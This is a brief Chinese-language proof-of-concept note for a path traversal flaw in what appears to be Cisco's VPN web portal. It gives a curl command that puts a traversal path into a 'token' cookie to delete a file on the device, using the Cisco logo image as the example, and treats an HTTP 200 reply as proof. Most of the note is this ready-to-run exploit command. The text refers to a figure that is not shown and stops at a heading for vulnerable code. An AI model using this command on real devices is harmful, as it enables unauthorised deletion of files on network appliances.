POC
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html
返回 200,即证明存在该漏洞。https://target/+CSCOE+/session_password.html

在 cookie 传写入删除的文件,以页面中 ciso 图片为例子:

也就是,https://target/+CSCOU+/csco_logo.gif
在 cookie 中写入 token=../+CSCOU+/csco_logo.gif

如上图所示,删除掉 ciso logo 图片。

漏洞代码如下:
